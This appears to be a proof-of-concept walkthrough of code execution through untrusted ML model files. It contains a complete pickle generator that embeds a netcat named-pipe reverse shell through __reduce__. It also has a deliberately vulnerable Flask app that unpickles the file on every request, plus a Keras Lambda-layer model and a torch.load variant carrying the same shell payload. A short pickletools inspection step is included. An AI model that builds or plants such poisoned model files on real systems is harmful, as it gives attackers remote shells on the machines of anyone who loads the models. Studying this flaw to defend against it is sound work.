Sample Pickle Exploit

Open a new tab and start a netcat listener for the reverse shell to connect back to

nc -nvl 14344

Open a new tab to run the malicious pickle generator script

python generate_pickle.py

Open a new tab to run the Flask app

flask run

Trigger the /predict endpoint; unpickling model.pkl runs the payload and the listener tab receives a shell

curl -d "x=1" http://127.0.0.1:5000/predict

The same problem exists with PyTorch, since torch.load unpickles the file:

import torch

torch.load("model.pkl")
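
A minimal end-to-end sketch of the same idea (the Exploit class, the torch_model.pt filename and the harmless id payload are illustrative, not from the gist; recent PyTorch versions default to weights_only=True, so full unpickling has to be requested explicitly):

import os

import torch


class Exploit:
    # pickle stores the (callable, args) pair returned by __reduce__,
    # so os.system("id") runs when the object is unpickled
    def __reduce__(self):
        return os.system, ("id",)


torch.save(Exploit(), "torch_model.pt")           # torch.save pickles the object
torch.load("torch_model.pt", weights_only=False)  # unpickling executes the payload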
The vulnerable Flask app loads the model with pickle on every request:

import pickle

from flask import Flask, request

app = Flask(__name__)


def load_model():
    # pickle.load will execute whatever a malicious model.pkl tells it to
    with open("model.pkl", "rb") as f:
        model = pickle.load(f)
    return model


@app.route("/predict", methods=["POST"])
def predict():
    model = load_model()
    # get input value from request
    # perform prediction
    # return prediction
    return '', 200
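
Each POST to /predict therefore runs pickle.load on model.pkl, which calls the malicious object's __reduce__ before any prediction happens; the command it executes is a named-pipe reverse shell pointing back at the nc listener: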
rm /tmp/JLTEH; mkfifo /tmp/JLTEH; cat /tmp/JLTEH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/JLTEH
The same trick works with a Keras model: a Lambda layer wraps arbitrary Python, and the function is called again when the saved model is rebuilt at load time:

from tensorflow.keras.layers import Input, Lambda, Softmax
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam


def custom_layer(tensor):
    # runs whenever the Lambda layer is applied to a tensor,
    # including while load_model reconstructs the graph
    PAYLOAD = 'rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH'
    __import__('os').system(PAYLOAD)
    return tensor


input_layer = Input(shape=(10,), name="input_layer")
lambda_layer = Lambda(custom_layer, name="lambda_layer")(input_layer)
output_layer = Softmax(name="output_layer")(lambda_layer)

model = Model(input_layer, output_layer, name="model")
model.compile(optimizer=Adam(learning_rate=0.0004), loss="categorical_crossentropy")
model.save("model.h5")
generate_pickle.py (run in the second step) builds model.pkl; the object's __reduce__ makes unpickling call os.system with a reverse-shell command:

import os
import pickle
import random
import string


def generate_random_string():
    # random 5-character suffix for the FIFO path, e.g. /tmp/JLTEH
    list_of_chars = random.choices(string.ascii_uppercase, k=5)
    return ''.join(list_of_chars)


def generate_payload(ip="127.0.0.1", port="14344"):
    r = "/tmp/" + generate_random_string()
    commands = [
        f'rm {r}; mkfifo {r}; cat {r}',
        '/bin/sh -i 2>&1',
        f'nc {ip} {port} > {r}'
    ]
    return ' | '.join(commands)


PAYLOAD = generate_payload()


class SampleClass:
    def __reduce__(self):
        # pickle calls os.system(PAYLOAD) when this object is deserialized
        return os.system, (PAYLOAD,)


def generate_pickle():
    with open("model.pkl", "wb") as f:
        pickle.dump(SampleClass(), f)


if __name__ == '__main__':
    generate_pickle()
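
Not part of the original gist, but useful for illustration: pickletools can disassemble model.pkl without executing it, which makes the embedded os.system call and the payload string visible:

import pickletools

with open("model.pkl", "rb") as f:
    # dis() only decodes opcodes, it never runs them
    pickletools.dis(f)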
Loading the H5 file from the Keras example is enough to trigger its payload, since the Lambda function is called while the model is being reconstructed:

from tensorflow.keras.models import load_model

load_model("model.h5")